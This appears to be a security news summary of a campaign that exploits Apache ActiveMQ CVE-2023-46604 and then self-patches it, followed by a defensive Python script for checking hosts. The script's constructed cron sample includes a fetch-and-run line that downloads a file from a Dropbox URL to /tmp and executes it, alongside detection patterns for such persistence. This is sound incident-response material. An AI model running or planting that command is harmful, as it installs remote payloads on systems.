Attackers hijack servers with DripDropper, then seal the backdoor shut with their own patch.
Attackers are exploiting a two-year-old Apache ActiveMQ vulnerability (CVE-2023-46604, an unauthenticated remote code execution flaw in the OpenWire protocol handler) on cloud-hosted Linux servers and deploying a loader, tracked by Red Canary as DripDropper, that is fetched from Dropbox. Once in, they patch the very vulnerability they abused, which both locks out rival intruders and hides the original entry point from anyone who later checks the ActiveMQ version. DripDropper establishes persistence through cron jobs and changes to the SSH configuration, while the operators use Cloudflare Tunnels and the Sliver C2 framework for command and control. Red Canary notes the unusual choice of a PyInstaller-packaged ELF binary and warns administrators not to take an already-patched service at face value: a patch that nobody on the team applied is itself an indicator of compromise, and this "self-patching" tactic is spreading. The campaign is one more reminder that patching on your own schedule, and monitoring logs for the persistence that follows a break-in, matter more than the patched state a server reports after the fact.
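The summary above names three things a responder would want to check on a suspect host: whether the installed ActiveMQ build is actually at a fixed version, whether cron contains an entry that pulls and runs a payload from a file-sharing service, and whether sshd_config has drifted from a known-good baseline. The script below is an added example written for this page, not Red Canary's tooling or anything from the campaign itself. The cron and sshd samples are constructed, the indicator patterns (download tools reaching a non-allowlisted host, commands run from temporary or hidden paths, loosened sshd directives) are illustrative assumptions rather than published IOCs, and the fixed-version table comes from the Apache advisory for CVE-2023-46604.

```python
"""Triage helpers for the DripDropper-style persistence described above.

Added example, not code from the original page, Red Canary, or the
campaign. Sample inputs are constructed; indicator patterns are assumptions.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# First fixed release on each branch, per the Apache advisory for
# CVE-2023-46604. Branches newer than 5.18 (e.g. 6.x) shipped fixed.
ACTIVEMQ_FIXED = {(5, 15): 16, (5, 16): 7, (5, 17): 6, (5, 18): 3}

# Constructed sample cron table (not captured from a real host).
SAMPLE_CRON = """\
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /usr/bin/curl -s https://www.dropbox.com/s/example/x -o /tmp/.x && /tmp/.x
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""

# Constructed baseline and "current" sshd_config excerpts.
BASELINE_SSHD = {"PermitRootLogin": "no", "PasswordAuthentication": "no"}
SAMPLE_SSHD = """\
Port 22
PermitRootLogin yes   # loosened after compromise (constructed)
PasswordAuthentication no
"""

DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
URL = re.compile(r"https?://[^\s'\"]+")
# /tmp, /dev/shm, /var/tmp, or any hidden path segment such as /tmp/.x
VOLATILE_PATH = re.compile(r"(/tmp/|/dev/shm/|/var/tmp/|/\.[A-Za-z0-9_-]+)")


def is_activemq_vulnerable(version: str) -> bool:
    """True if this ActiveMQ version predates the fix for CVE-2023-46604."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    if (major, minor) > (5, 18):
        return False  # 5.19+ and 6.x were released after the fix
    fix = ACTIVEMQ_FIXED.get((major, minor))
    if fix is None:
        return True  # older branch with no fixed release at all
    return patch < fix


def suspicious_cron_entries(cron_text: str, allowed_hosts: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (line, reasons) for cron commands that download from an
    unexpected host or execute from a temporary/hidden path."""
    findings = []
    for line in cron_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = []
        if DOWNLOADERS.search(entry):
            for url in URL.findall(entry):
                host = urlparse(url).hostname or ""
                if host not in allowed_hosts:
                    reasons.append(f"downloads from {host}")
        if VOLATILE_PATH.search(entry):
            reasons.append("executes from a temporary or hidden path")
        if reasons:
            findings.append((entry, reasons))
    return findings


def sshd_config_drift(config_text: str, baseline: Dict[str, str]) -> Dict[str, Tuple[str, str]]:
    """Compare top-level sshd_config directives against a baseline.
    Keys are matched case-insensitively (as sshd does); 'key=value' form
    is accepted; Match blocks are not modelled."""
    current = {}
    for line in config_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, value = (re.split(r"[\s=]+", line, maxsplit=1) + [""])[:2]
        current[key.lower()] = value.strip()
    drift = {}
    for key, expected in baseline.items():
        actual = current.get(key.lower(), "<unset>")
        if actual.lower() != expected.lower():
            drift[key] = (expected, actual)
    return drift


if __name__ == "__main__":
    print("5.18.2 vulnerable:", is_activemq_vulnerable("5.18.2"))
    for entry, reasons in suspicious_cron_entries(SAMPLE_CRON, ["mirror.example.org"]):
        print("cron:", entry, "->", "; ".join(reasons))
    print("sshd drift:", sshd_config_drift(SAMPLE_SSHD, BASELINE_SSHD))
```

The version check is deliberately separate from the persistence checks: on a self-patched host the version check will come back clean, and that is exactly when an unexplained cron entry or an sshd_config change that nobody on the team made should carry the weight of the decision.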

